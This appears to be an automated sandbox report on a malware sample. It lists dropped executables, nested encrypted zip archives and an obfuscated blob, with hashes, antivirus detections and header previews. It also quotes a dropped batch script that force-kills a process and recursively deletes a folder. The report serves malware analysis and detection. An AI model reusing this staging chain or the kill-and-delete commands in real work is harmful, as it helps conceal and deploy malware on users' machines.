                                                                                                                                                                                                                                                SHA-512:E145BBC38DDE93C5C9BA771F95B389B88C9B184D0F308E29D5AE92623B76299DDDE45CABB51D5220A8E99B67C462D367A29B34DAB4228BBBE7FA21B42BCE17A9
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$........i...........nG@.....ZR.....ZC.....ZU.................Z\.....ZB.....ZG....Rich...................PE..L....,.e.....................@....................@.......................... .......J......................................[.A.o.....@......................................................m...................................................... . ..@......N..................@....rsrc.........@..p...^..............@....idata ......A.....................@... ..*...A.....................@...ewodcgyw.@....k..<..................@...mohodnpu............................@....taggant.0......."..................@...........................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1855488
                                                                                                                                                                                                                                                Entropy (8bit):7.946588598899139
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:Y2UCAToY6BdKMT9qwCwcvhvyBpB6yMRTNzbXY6lkFwNbM6HhrXM:Y2UIB0mXcY38yQNNMmhI
                                                                                                                                                                                                                                                MD5:D52E2D9DC21C02FA5F8161754B7B6463
                                                                                                                                                                                                                                                SHA1:8D987604E02EDFAA9AA088E0B481215AFAB12B2F
                                                                                                                                                                                                                                                SHA-256:62757C9F26DCA61DE4521ACA806065C1862FFD5EEBA75BF5D66C558438168563
                                                                                                                                                                                                                                                SHA-512:B2FA0D89A29F244C6DF4231D7CBFF1D2E799B4768E2421C4B2838BA1B3673CA5E39497A8CD0203A62F38081A2A5BFF6375A00A5838AC484D37DAAA1E828B1E6B
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZx.....................@...................................x...........!..L.!This program cannot be run in DOS mode.$..PE..L....<_g.............................0I...........@..........................`I...........@.................................T0..h.... .......................1...................................................................................... . .........H..................@....rsrc........ .......X..............@....idata .....0.......Z..............@... ..*..@.......\..............@...vznsjynp.....P/......^..............@...aooxnxiu..... I......*..............@....taggant.0...0I.."..................@...................................................................................................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2899456
                                                                                                                                                                                                                                                Entropy (8bit):6.524805341613476
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:dUKOFohGWJqh/PVWikBefgLsJ/UtQneLgNfP/TTi:dUKOFohGWJinVzk2oKneLgl/a
                                                                                                                                                                                                                                                MD5:AD87440D4B97E759F9D4EE9D6279D06E
                                                                                                                                                                                                                                                SHA1:7525695152B7C233EB6EB473CB8ED54E476B28BE
                                                                                                                                                                                                                                                SHA-256:F87A85680EB816889BBEFE15AF11A68930EB67EF6904DC7201EDAFDDDF1A1BB8
                                                                                                                                                                                                                                                SHA-512:F1D97BC33000CE39DD207B7C824CD4B84581055831C98E72D9F3FACFBA1766C90AA3921D96CF486C083526C4062BD3BD66818D74CF4142DED32C878AC30AB903
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$....... ...d..d..d....s.|....F.i....r.^..m.[.g..m.K.b....g..d.......w.w....E.e..Richd..........PE..L....dTg.....................(.......pO...........@...........................O.......,...@.................................M.$.a.....$.......................$..................................................................................... . ..$......h..................@....rsrc.........$......x..............@....idata ......$......z..............@...lccfmtjw..*...$...*..|..............@...cjdwjaeg.....`O.......,.............@....taggant.0...pO.."....,.............@...........................................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\abc3bc1985\skotes.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):969216
                                                                                                                                                                                                                                                Entropy (8bit):6.700095846266009
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:lqDEvCTbMWu7rQYlBQcBiT6rprG8aEIq85:lTvC/MTQYxsWR7aEIq
                                                                                                                                                                                                                                                MD5:78249416F6EFA7B1A765C157EA01D5FC
                                                                                                                                                                                                                                                SHA1:CED7EBDE25C326D99103D72054585D7C6374E1BF
                                                                                                                                                                                                                                                SHA-256:B901E2AA2479D8B9B6C1675FCC49C656ABD93D656063BEC5DDADA706BA4BC42D
                                                                                                                                                                                                                                                SHA-512:A280680201A0DCFF7C774501FCE1CA73290AC5F4F610E15BDCA9716B209A95FA4377474BB93B0D84E8004CB4C55AC26A6BD8E99B3638625AF726FCBC1C0E2545
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                Preview:MZ......................@................................... ...........!..L.!This program cannot be run in DOS mode....$...................j:......j:..C...j:......@.*...........................n......~............{.......{......{.......z....{......Rich...................PE..L....eg..........".................w.............@.......................... ............@...@.......@.....................d...|....@...^.......................u...........................4..........@............................................text............................... ..`.rdata..............................@..@.data...lp.......H..................@....rsrc....^...@...`..................@..@.reloc...u.......v...T..............@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):60
                                                                                                                                                                                                                                                Entropy (8bit):4.038920595031593
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
                                                                                                                                                                                                                                                MD5:D17FE0A3F47BE24A6453E9EF58C94641
                                                                                                                                                                                                                                                SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
                                                                                                                                                                                                                                                SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
                                                                                                                                                                                                                                                SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:# PowerShell test file to determine AppLocker lockdown mode
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:PE32 executable (GUI) Intel 80386, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):3047936
                                                                                                                                                                                                                                                Entropy (8bit):6.5380962224606805
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:49152:rXbVHNeIAyjLGBiZQo42rhxAZimUH0wH6faFgmiCk/uIL:rzxXnGBiZQo42rhxAZi0wHymU
                                                                                                                                                                                                                                                MD5:99A7A8AB2463DD70F90E0AB4E0AEC4A8
                                                                                                                                                                                                                                                SHA1:B9E2B99B7124D83DF3B7CD052231CB35D1D6EFCB
                                                                                                                                                                                                                                                SHA-256:89601168C7196328F763FAF4DD415B041C94F6D5FE5C2B7094D49DBA69926A61
                                                                                                                                                                                                                                                SHA-512:8E775104CC32B5426FBFE170632CA36949E66701A52B83FD8378B4ECA239F928094DFCA10BA9AE363C8AAAD59F863260427FC5449EA7CA0E22DDDA4256326E55
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: Avira, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: Joe Sandbox ML, Detection: 100%
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 50%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........-I..C...C...C...@...C...F.B.C.6.G...C.6.@...C.6.F...C...G...C...B...C...B.5.C.x.J...C.x.....C.x.A...C.Rich..C.........................PE..L....V.f.............................02...........@..........................`2.....#./...@.................................W...k.............................2...............................2..................................................... . ............................@....rsrc...............................@....idata ............................@...tddfmghq.p+......h+.................@...zxizpfjk..... 2......\..............@....taggant.0...02.."...`..............@...........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\Desktop\file.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:modified
                                                                                                                                                                                                                                                Size (bytes):26
                                                                                                                                                                                                                                                Entropy (8bit):3.95006375643621
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:3:ggPYV:rPYV
                                                                                                                                                                                                                                                MD5:187F488E27DB4AF347237FE461A079AD
                                                                                                                                                                                                                                                SHA1:6693BA299EC1881249D59262276A0D2CB21F8E64
                                                                                                                                                                                                                                                SHA-256:255A65D30841AB4082BD9D0EEA79D49C5EE88F56136157D8D6156AEF11C12309
                                                                                                                                                                                                                                                SHA-512:89879F237C0C051EBE784D0690657A6827A312A82735DA42DAD5F744D734FC545BEC9642C19D14C05B2F01FF53BC731530C92F7327BB7DC9CDE1B60FB21CD64E
                                                                                                                                                                                                                                                Malicious:true
                                                                                                                                                                                                                                                Preview:[ZoneTransfer]....ZoneId=0
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (DLL) (GUI) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1679360
                                                                                                                                                                                                                                                Entropy (8bit):6.278252955513617
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:S+clx4tCQJSVAFja8i/RwQQmzgO67V3bYgR+zypEqxr2VSlLP:jclmJSVARa86xzW3xRoyqqxrT
                                                                                                                                                                                                                                                MD5:72491C7B87A7C2DD350B727444F13BB4
                                                                                                                                                                                                                                                SHA1:1E9338D56DB7DED386878EAB7BB44B8934AB1BC7
                                                                                                                                                                                                                                                SHA-256:34AD9BB80FE8BF28171E671228EB5B64A55CAA388C31CB8C0DF77C0136735891
                                                                                                                                                                                                                                                SHA-512:583D0859D29145DFC48287C5A1B459E5DB4E939624BD549FF02C61EAE8A0F31FC96A509F3E146200CDD4C93B154123E5ADFBFE01F7D172DB33968155189B5511
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$.........w...$...$...$.&.$...$.&.$...$...$...$.&.$%..$.&.$..$.&G$...$.&.$...$.&.$...$.&.$...$Rich...$........................PE..d.....n\.........." .........H...............................................P............`.............................................y...l...x........{...p.......................................................................................................text............................... ..`.rdata..9...........................@..@.data...............................@....pdata.......p... ..................@..@.rsrc....{.......|..................@..@.reloc...0.......2...n..............@..B........................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
                                                                                                                                                                                                                                                File Type:PE32+ executable (console) x86-64, for MS Windows
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):468992
                                                                                                                                                                                                                                                Entropy (8bit):6.157743912672224
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6144:fz1gL5pRTMTTjMkId/BynSx7dEe6XwzRaktNP08NhKs39zo43fTtl1fayCV7+DHV:r1gL5pRTcAkS/3hzN8qE43fm78V
                                                                                                                                                                                                                                                MD5:619F7135621B50FD1900FF24AADE1524
                                                                                                                                                                                                                                                SHA1:6C7EA8BBD435163AE3945CBEF30EF6B9872A4591
                                                                                                                                                                                                                                                SHA-256:344F076BB1211CB02ECA9E5ED2C0CE59BCF74CCBC749EC611538FA14ECB9AAD2
                                                                                                                                                                                                                                                SHA-512:2C7293C084D09BC2E3AE2D066DD7B331C810D9E2EECA8B236A8E87FDEB18E877B948747D3491FCAFF245816507685250BD35F984C67A43B29B0AE31ECB2BD628
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Antivirus:
                                                                                                                                                                                                                                                • Antivirus: ReversingLabs, Detection: 0%
                                                                                                                                                                                                                                                Preview:MZ......................@...............................................!..L.!This program cannot be run in DOS mode....$..........(...{...{...{...{...{...{...{...{...{...{...{...{...{..!{...{...{...{...{...{Rich...{................PE..d.....n\.........."..........l...... .........@...........................................`.....................................................x....`..........,a...........p.......................................................... ............................text............................... ..`.rdata..............................@..@.data....,..........................@....pdata..,a.......b..................@..@.rsrc........`......................@..@.reloc.......p......................@..B........................................................................................................................................................................................................................................................................
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\1018743001\c359af6492.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with CRLF line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):222
                                                                                                                                                                                                                                                Entropy (8bit):4.855194602218789
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:6:vFuj9HUHOPLtInnIgvRY77flFjfA+qpxuArS3+xTfVk3:duj9HeONgvRYnlfYFrSMTtk3
                                                                                                                                                                                                                                                MD5:68CECDF24AA2FD011ECE466F00EF8450
                                                                                                                                                                                                                                                SHA1:2F859046187E0D5286D0566FAC590B1836F6E1B7
                                                                                                                                                                                                                                                SHA-256:64929489DC8A0D66EA95113D4E676368EDB576EA85D23564D53346B21C202770
                                                                                                                                                                                                                                                SHA-512:471305140CF67ABAEC6927058853EF43C97BDCA763398263FB7932550D72D69B2A9668B286DF80B6B28E9DD1CBA1C44AAA436931F42CC57766EFF280FDB5477C
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:Cd /d %1..Rd "%SfxVarApiPath%"..For /f "Tokens=1,2 Delims=," %%I In ('TaskList /fo CSV /nh') Do (.. If %%I==%2 (.. Set /a N+=1.. Set PID=%%~J.. )..)..If %N% EQU 1 Rd /s /q %1..If %N% GTR 1 TaskKill /pid %PID% /t /f
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:ASCII text, with very long lines (65536), with no line terminators
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):2355713
                                                                                                                                                                                                                                                Entropy (8bit):5.891648193754473
                                                                                                                                                                                                                                                Encrypted:false
                                                                                                                                                                                                                                                SSDEEP:24576:5yZBPkpRrP9pxC+XvoflcYy36s3vb0EecYy37n92k8GtGAQZ67hR7krC/Cyf0/xO:R9kqGu7okoZscCnf0/Zs9p
                                                                                                                                                                                                                                                MD5:579A63BEBCCBACAB8F14132F9FC31B89
                                                                                                                                                                                                                                                SHA1:FCA8A51077D352741A9C1FF8A493064EF5052F27
                                                                                                                                                                                                                                                SHA-256:0AC3504D5FA0460CAE3C0FD9C4B628E1A65547A60563E6D1F006D17D5A6354B0
                                                                                                                                                                                                                                                SHA-512:4A58CA0F392187A483B9EF652B6E8B2E60D01DAA5D331549DF9F359D2C0A181E975CF9DF79552E3474B9D77F8E37A1CF23725F32D4CDBE4885E257A7625F7B1F
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:KmO6sb9bzFlO6QmlyBR3cUuBrPdmJRJBhXshklfui2fRJCiITlYNEM2EqC9x9I0qVq7CGnIhkwh6hvGvu5pkfBRaoLATG90WNTmCTDFIBTSnd7l9KiCxIUJ5zlBvrKkHZaxyJb0N052Q1AaMDCASX2cw1ZaV1bKcufYPprTSqVIRscgIruKC2MOUPLxNBR1egyVxwSbedVhVl89lRxHAMRMf16G6Ry1TTz7dOtnEaLQowPwuw8eDnR20ZOyf9yYTVcpDsiS4K2VzryfyiwiOXZDq7UaTFrtOgtVQzuNXN74O8xkfvt4Ykzxcs60WfAkGZKsYbwZWS4bPPY8cze1vDL6leHmcDUIbsBvTleZtzGhgeYGdRaUmv5ljenoBZOBDIndh9KTa7zBVHuP4jAK8C2IKaB5BgFReYTleqD0cCkhTdxbkQAMwHPuKktcCRORGmFfE37OzhnpNUtRyIHoGBwau6RcKp6vTNwIWRMkDjZaejD2NS5TCgRvcwgZcldKIAtOqIN0TXMXlnX6scNgHltMTvvwSZbBsDdCGRINZlutVfbP6joQl5sw21ICykYYYKwRfLlfpREpOzuAjwo7oC8hJ4Tv652auJh1RujdaLcIfX5oB1GDuu95ojl52qB08Lzg7nIl7yDb4k9X8rUPZ857XTGTaXkhL77wwG75hAnvfazjbPfP5GZrDYRdhe2I0zSJZuV5aaWd5Imf8Ck0w9ALkKR7xhRlclC4FnJOBuXxpdcsG9gE8tgukaoXpzf4z0CHJ0VOfBNcErBEPyoWMZfee3Vfg2NyLVPvaC6c5HNC1mZSr0SpB1RAlj2w7ST9eZL5DUYwl8p6flt6I3p7MBJrZLlY3LgBSr5F4BYYU6sebHdx0ES2Ci6J9wBw0wGLCy8SeSDS45pkrvWvTZkvW2oFTNBda3aYJyut0zJi1Chjp4xQkH1cEMWZUOy7MueiWNcfeKZqM4Gg2hr7XoLoTQXyvcXvxeOwXoXJKXvu4
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v2.0 to extract, compression method=deflate
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1799594
                                                                                                                                                                                                                                                Entropy (8bit):7.99773141173711
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:8yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ+:tj13Trb6i5iGmuXZTbBizt0Jhc
                                                                                                                                                                                                                                                MD5:5659EBA6A774F9D5322F249AD989114A
                                                                                                                                                                                                                                                SHA1:4BFB12AA98A1DC2206BAA0AC611877B815810E4C
                                                                                                                                                                                                                                                SHA-256:E04346FEE15C3F98387A3641E0BBA2E555A5A9B0200E4B9256B1B77094069AE4
                                                                                                                                                                                                                                                SHA-512:F93ABF2787B1E06CE999A0CBC67DC787B791A58F9CE20AF5587B2060D663F26BE9F648D116D9CA279AF39299EA5D38E3C86271297E47C1438102CA28FCE8EDC4
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./..t?......6FU....;2].@...z..8..K^B/W..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1799748
                                                                                                                                                                                                                                                Entropy (8bit):7.997729415613798
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:5yj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJ/:4j13Trb6i5iGmuXZTbBizt0Jhl
                                                                                                                                                                                                                                                MD5:5404286EC7853897B3BA00ADF824D6C1
                                                                                                                                                                                                                                                SHA1:39E543E08B34311B82F6E909E1E67E2F4AFEC551
                                                                                                                                                                                                                                                SHA-256:EC94A6666A3103BA6BE60B92E843075A2D7FE7D30FA41099C3F3B1E2A5EBA266
                                                                                                                                                                                                                                                SHA-512:C4B78298C42148D393FEEA6C3941C48DEF7C92EF0E6BAAC99144B083937D0A80D3C15BD9A0BF40DAA60919968B120D62999FA61AF320E507F7E99FBFE9B9EF30
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu....(^......U.{.......l..RtFDi......./
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1799902
                                                                                                                                                                                                                                                Entropy (8bit):7.997726708945573
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:Cyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJV:nj13Trb6i5iGmuXZTbBizt0Jh3
                                                                                                                                                                                                                                                MD5:5EB39BA3698C99891A6B6EB036CFB653
                                                                                                                                                                                                                                                SHA1:D2F1CDD59669F006A2F1AA9214AEED48BC88C06E
                                                                                                                                                                                                                                                SHA-256:E77F5E03AE140DDA27D73E1FFE43F7911E006A108CF51CBD0E05D73AA92DA7C2
                                                                                                                                                                                                                                                SHA-512:6C4CA20E88D49256ED9CABEC0D1F2B00DFCF3D1603B5C95D158D4438C9F1E58495F8DFA200DBE7F49B5B0DD57886517EB3B98C4190484548720DAD4B3DB6069E
                                                                                                                                                                                                                                                Malicious:false
                                                                                                                                                                                                                                                Preview:PK........n..Y...rDv..Dv......file_2.zipPK........n..Y*C.?.u...u......file_1.zipPK........i..Y..5..u..........in.exe.Y.4.a...3c0.e.c..X....0.\[...3Hb....^.*..T.-f..$k.b..#&.B.v...s.s....{.......{..|.s.O......._....H.........(4.Io..""..q...CO.......G...)1......!...c:....=.....h.w?.o.q................4,.....\..:................_................(...S......Q.....wP..../3.......?..b......@.m.;.W...........:......8.......a..o.O....a......."......'..S....@....&.V.........*(..p...u.sa=F.....~.".p..".B...eE...x..w.m....d..h...4...@.`......F.Z......h.[._O.\f....t..?..7s|&Fj..T:.m..*.J..sk..t.\K*]...h5..[...).E.,.4.....u...tP7B.0.I...H.15........+..[..G..)...M..;..H.?g...\.\.ZT.Q..&..@....nnx......s..1W...x.W..M2.h@.C@<.B\.&..:hgwM...$...y....._..z?....< ..T.._..^./m{.E..Y*.;ol..&_/./....3........x.%....$..=.^}.}..53.....|...|-... #..Z-.b.Ej...q.u..L-..x8...%..P:PKs...]....}...;:.Z........H..3k..F..:....X2a.e..G..f6...}....H.V.#r.H....T.....!....~...R%xu..
                                                                                                                                                                                                                                                Process:C:\Users\user\AppData\Local\Temp\main\7z.exe
                                                                                                                                                                                                                                                File Type:Zip archive data, at least v1.0 to extract, compression method=store
                                                                                                                                                                                                                                                Category:dropped
                                                                                                                                                                                                                                                Size (bytes):1800056
                                                                                                                                                                                                                                                Entropy (8bit):7.997723543142523
                                                                                                                                                                                                                                                Encrypted:true
                                                                                                                                                                                                                                                SSDEEP:49152:Zyj13b27Gvrb6VZvqF7iGc8bbmuXZTsD28cz2TPt0JhJQ:Yj13Trb6i5iGmuXZTbBizt0Jhm
                                                                                                                                                                                                                                                MD5:7187CC2643AFFAB4CA29D92251C96DEE
                                                                                                                                                                                                                                                SHA1:AB0A4DE90A14551834E12BB2C8C6B9EE517ACAF4
                                                                                                                                                                                                                                                SHA-256:C7E92A1AF295307FB92AD534E05FBA879A7CF6716F93AEFCA0EBFCB8CEE7A830
                                                                                                                                                                                                                                                SHA-512:27985D317A5C844871FFB2527D04AA50EF7442B2F00D69D5AB6BBB85CD7BE1D7057FFD3151D0896F05603677C2F7361ED021EAC921E012D74DA049EF6949E3A3
                                                                                                                                                                                                                                                Malicious:false
